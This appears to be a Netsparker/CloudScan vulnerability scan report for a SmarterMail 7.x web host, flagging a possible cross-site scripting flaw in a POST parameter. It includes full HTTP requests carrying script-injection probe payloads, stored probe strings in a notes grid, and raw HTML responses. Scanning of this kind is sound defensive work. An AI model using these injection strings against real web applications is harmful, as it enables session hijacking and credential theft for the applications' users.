<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" name="ctl00_MPH_HyperGrid1_CB64_ZmE3NGZjMWRhMjI5NDJlMTliMmI4YzI0Nzc1ZGY5ZDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" name="ctl00_MPH_HyperGrid1_CB64_MzA1ZTg5YzI5MWYzNDYxMThiMzA2NDI3N2EwYTdiM2I-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009584)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" name="ctl00_MPH_HyperGrid1_CB64_YzcyY2MwNmYzZDAyNDU5MmFkNTBkMDY5ZDZmOTFiNDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" name="ctl00_MPH_HyperGrid1_CB64_ZWMyNmNiMzM1YzY3NDJmMDliMjMyYzVlYjgxYTQ2ODU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" name="ctl00_MPH_HyperGrid1_CB64_ZGVjNjA3YTkzZjc5NDc2NGIwNmZkMDYyZWJjYThhMGY-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" name="ctl00_MPH_HyperGrid1_CB64_MmU4NTI1NGZkNzVlNDgxNDlmNjViNjZjZTM0NDY4YzE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" name="ctl00_MPH_HyperGrid1_CB64_MjBkM2VmODY1MjJlNDkxNThhODY3MjNmMGYzNzlhYTM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" name="ctl00_MPH_HyperGrid1_CB64_NzAwMmQxNDM2MWY4NDBhZjg0YWY2MWRjNmM3MzBmN2Y-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
[Possible] Cross-site Scripting
[Possible] Cross-site Scripting
1
TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /default.aspx
/default.aspx |
Parameters
| Parameter | Type | Value |
| ctl00%24ScriptManager1 | POST | ctl00$ScriptManager1|ctl00$Split$LP$lnkUpdate |
| __EVENTTARGET | POST | ctl00$Split$LP$lnkUpdate |
| __EVENTARGUMENT | POST | UserContacts|/Main/frmEmptyPreviewOuter.aspx?type=contacts |
| __VIEWSTATE | POST | /wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA/AQKKvJgVAw== |
| ctl00%24Split%24LP%24SessionKey | POST | '"--><script>alert(0x00152B)</script> |
| ctl00%24PageTitle | POST | 3 |
| ctl00%24PanelLoadedState | POST | {} |
| __ASYNCPOST | POST | true |
Notes
Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Request
POST /default.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 495
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7c%2fMain%2ffrmEmptyPreviewOuter.aspx%3ftype%3dcontacts&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA%2fAQKKvJgVAw%3d%3d&ctl00%24Split%24LP%24SessionKey='%22--%3e%3cscript%3enetsparker(0x00152B)%3c%2fscript%3e&ctl00%24PageTitle=3&ctl00%24PanelLoadedState=%7b%7d&__ASYNCPOST=true
Referer: http://vulnerable.smartermail.7.x.host:9998/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn; SelectedLanguage=en
Content-Length: 495
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
ctl00%24ScriptManager1=ctl00%24ScriptManager1%7cctl00%24Split%24LP%24lnkUpdate&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate&__EVENTARGUMENT=UserContacts%7c%2fMain%2ffrmEmptyPreviewOuter.aspx%3ftype%3dcontacts&__VIEWSTATE=%2fwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZGQAofCuGKRyjE010WA%2fAQKKvJgVAw%3d%3d&ctl00%24Split%24LP%24SessionKey='%22--%3e%3cscript%3enetsparker(0x00152B)%3c%2fscript%3e&ctl00%24PageTitle=3&ctl00%24PanelLoadedState=%7b%7d&__ASYNCPOST=true
Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:12:30 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 5962
Connection: Close
14723|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
<div style="display: none">
<div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div class="PageTitle" id="SectionHeader">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle' name='ctl00$Split$LP$ctl01$menuContactsSourceTitle' style='z-index:1002'>
<li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource' style='z-index: 1002'><a class='hmA hmHasChildren' href='#'>My Contacts<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf_CB' group='source' type='checkbox'checked='checked'></div>My Contacts</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList_CB' group='source' type='checkbox'></div>Global Address List</a></li>
<li class='hmSeperator' style='z-index:1002'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceManage' style='z-index: 1002'><a class='hmA' href='#'>Mapped Resources</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>
</div>
</div>
</div>
<div id="ButtonBar" class="ButtonBar">
<!-- HyperMenu -->
<div class='hmMenuBar'><ul class='hmMenu hmMenuBar hmList' id='ctl00_Split_LP_ctl01_menuContacts' name='ctl00$Split$LP$ctl01$menuContacts' style='z-index:1001'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>New<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_b7d9b2bd5f28443c84a0178adbb0a050' style='z-index: 1001'><a class='hmA' href='#'>New Message</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_1413e4ca1c0040fc9dd9651dd66aaf9b' style='z-index: 1001'><a class='hmA' href='#'>New Contact</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_148b4e3c58354e7e908efb233bd9300f' style='z-index: 1001'><a class='hmA' href='#'>New Appointment</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_7239e2ab6f054d5e84c1686297ff21c4' style='z-index: 1001'><a class='hmA' href='#'>New Task</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuGlobalNew_5ad20d5a60cf4a20a34edf0b2e089837' style='z-index: 1001'><a class='hmA' href='#'>New Note</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuSelectAll' style='z-index: 1001'><a class='hmA' href='#'>Select All</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuDelete' style='z-index: 1001'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuEmailSelected' style='z-index: 1001'><a class='hmA' href='#'>Send Email</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuAddToOutlook' style='z-index: 1001'><a class='hmA' href='#'>Add to Outlook</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Import/Export<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuImport' style='z-index: 1001'><a class='hmA' href='#'>Import</a></li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExport' style='z-index: 1001'><a class='hmA' href='#'>Export</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsActions_menuImportExport_menuExportAll' style='z-index: 1001'><a class='hmA' href='#'>Export All</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Category<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCategoryAllCategories_CB' group='category' type='checkbox'checked='checked'></div>All Categories</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuaCategoryNOCATEGORY_CB' group='category' type='checkbox'></div>No Category</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterCategory_menuCate1_CB' group='category' type='checkbox'></div>1</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsFilter_menuContactsFilterClear' style='z-index: 1001'><a class='hmA' href='#'>Reset Filter</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmItem' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort' style='z-index: 1001'><a class='hmA hmHasChildren' href='#'>Sort<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortAsc_CB' group='Sort' type='checkbox'checked='checked'></div>Ascending</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDesc_CB' group='Sort' type='checkbox'></div>Descending</a></li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortDisplayName_CB' group='SortType' type='checkbox'checked='checked'></div>Display Name</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortEmailAddress_CB' group='SortType' type='checkbox'></div>Email</a></li>
<li class='hmItem hmLast hmCheckable' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany' style='z-index: 1001'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuContactsSort_menuContactsSortCompany_CB' group='SortType' type='checkbox'></div>Company</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
<li class='hmSeperator' style='z-index:1001'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContacts_menuContactsView_menuColumns' style='z-index: 1001'><a class='hmA' href='#'>Visible Fields</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>
<div class='hmClear'><!-- --></div>
</div>
<div id="FilterBar" class="FilterBar" style="visibility: hidden">
<div id="FilterBarContents" class="RoundedSearchBox">
<div class="RoundedSearchBoxLeft">
<div class="RoundedSearchBoxRight">
<label for="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBoxLabel" style="display: none">Search...</label>
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnGo" class="BBButton GoButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnGo',''); return false;"><span class="BBInner"></span></a></div>
<input name="ctl00$Split$LP$ctl01$searchBarContacts$FilterBox" type="text" id="ctl00_Split_LP_ctl01_searchBarContacts_FilterBox" autocomplete="off" />
<div id="ctl00_Split_LP_ctl01_searchBarContacts_btnClear" class="BBButton ClearButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$Split$LP$ctl01$searchBarContacts$btnClear',''); return false;"><span class="BBInner"></span></a></div>
</div>
</div>
</div>
<a id="ctl00_Split_LP_ctl01_lnkFilter" href="javascript:__doPostBack('ctl00$Split$LP$ctl01$lnkFilter','')"></a>
</div>
<div id="LeftScrollable" class="ContentDiv">
<span id="ctl00_Split_LP_ctl01_HyperMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_Split_LP_ctl01_ctl00' name='ctl00$Split$LP$ctl01$ctl00' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_Split_LP_ctl01_ctl00_hm0' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_ctl00_hm1' style='z-index: 800'><a class='hmA' href='#'>Send Email</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<table id="ctl00_Split_LP_ctl01_grdContactsOuterTable" class="HyperGridOuter" style="border-collapse:collapse;border-spacing:0px;width:100%;">
<tr>
<td class="HyperGridContentCell" id="ctl00_Split_LP_ctl01_grdContactsContentCell" style="padding:0;vertical-align:top;" >
<div class="HyperGridWrapper" id="ctl00_Split_LP_ctl01_grdContacts" style="padding-right:0;">
<div id="ctl00_Split_LP_ctl01_grdContactsHeaderWrapper" style="display:none">
<table id="ctl00_Split_LP_ctl01_grdContactsHeaderTable" class="HyperGrid" style="table-layout: fixed">
<colgroup><col /><col /></colgroup>
<thead>
<tr><th scope="col" class="showsel lc nw CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_Split_LP_ctl01_grdContactsCheckAll" name="ctl00$Split$LP$ctl01$grdContactsCheckAll" /></th><th scope="col" class="rc al nw BoldFirstMultiLine" style="overflow: hidden">Contact</th></tr>
</thead>
</table>
</div>
<div id="ctl00_Split_LP_ctl01_grdContactsContentWrapper" class="HyperGridContentWrapper" style="overflow-y:hidden;overflow-x:visible;">
<table id="ctl00_Split_LP_ctl01_grdContactsContentTable" class="HyperGrid">
<colgroup><col /><col /></colgroup>
</table>
</div>
</div>
</td>
</tr>
</table>
<div id="ctl00_Split_LP_ctl01_grdContactsScroller" class="HyperGridScroller" style="visibility:hidden;position:relative;width:22px;overflow-y:scroll;" ><div id="ctl00_Split_LP_ctl01_grdContactsInnerScroller" style="height: 10px"></div></div>
<div style="position:absolute;top:-100px;width:0;height:0;">
<input id="ctl00_Split_LP_ctl01_grdContactsFocuser" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsSelectedIDs" name="ctl00$Split$LP$ctl01$grdContactsSelectedIDs" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
<input id="ctl00_Split_LP_ctl01_grdContactsScrollPos" name="ctl00$Split$LP$ctl01$grdContactsScrollPos" type="text" style="width:1px;height:1px;margin:0;padding:0;outline:none;border:none" />
</div>
</div>
<div id="ctl00_Split_LP_ctl01_Footer" class="Footer">
<div class="FooterSummary">
<span id="ctl00_Split_LP_ctl01_lblCount">0 contact(s)</span>
</div>
</div>
|0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||208|hiddenField|__VIEWSTATE|/wEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBSBjdGwwMCRTcGxpdCRMUCRjdGwwMSRncmRDb250YWN0cw8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGT8XpaY8h6fxawd0JLTm1yS3kkTOg==|24|asyncPostBackControlIDs||ctl00$Split$LP$lnkUpdate|0|postBackControlIDs|||34|updatePanelIDs||tctl00$Split$LP$StyledUpdatePanel1|0|childUpdatePanelIDs|||33|panelsToRefreshIDs||ctl00$Split$LP$StyledUpdatePanel1|2|asyncPostBackTimeout||90|12|formAction||default.aspx|1|pageTitle||3|170|scriptBlock|ScriptPath|/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstCjdZSr2uDpU6O2NTF1ISnP_zYh5FLRQP7rbZ36OXJ90&t=ffffffff8fb8c655|796|scriptBlock|ScriptContentWithTags|{"text":"\r\n var startup = function() {\r\n $(\"#FilterBarContents\").magicLabels();\r\n\r\n $(\"#ctl00_Split_LP_ctl01_searchBarContacts_FilterBox\&q..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:12:30 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 5962
Connection: Close
14723|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
<div style="display: none">
<div id="ctl00_Split_LP_ctl01_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_Split_LP_ctl01_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>
</div>
<div class="PageTitle" id="SectionHeader">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<!-- HyperMenu -->
<div class='hmNavMenu'><ul class='hmMenu hmNavMenu hmList' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle' name='ctl00$Split$LP$ctl01$menuContactsSourceTitle' style='z-index:1002'>
<li class='hmItem hmFirst hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource' style='z-index: 1002'><a class='hmA hmHasChildren' href='#'>My Contacts<span class='hmArrow'></span></a>
<div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
<li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceSelf_CB' group='source' type='checkbox'checked='checked'></div>My Contacts</a></li>
<li class='hmItem hmCheckable' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList' style='z-index: 1002'><a class='hmA' href='#'><div class='hmCheckbox'><input name='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuaSourceGlobalAddressList_CB' group='source' type='checkbox'></div>Global Address List</a></li>
<li class='hmSeperator' style='z-index:1002'><span><!-- --></span></li>
<li class='hmItem hmLast' id='ctl00_Split_LP_ctl01_menuContactsSourceTitle_menuContactsSource_menuSourceManage' style='z-index: 1002'><a class='hmA' href='#'>Mapped Resources</a></li>
</ul><div class='hmScrollDown'></div></div>
</li>
</ul>
</div>
</div>
</div>
</div>
<div id="ButtonBar" class="ButtonBar">
<!-- HyperMenu -->
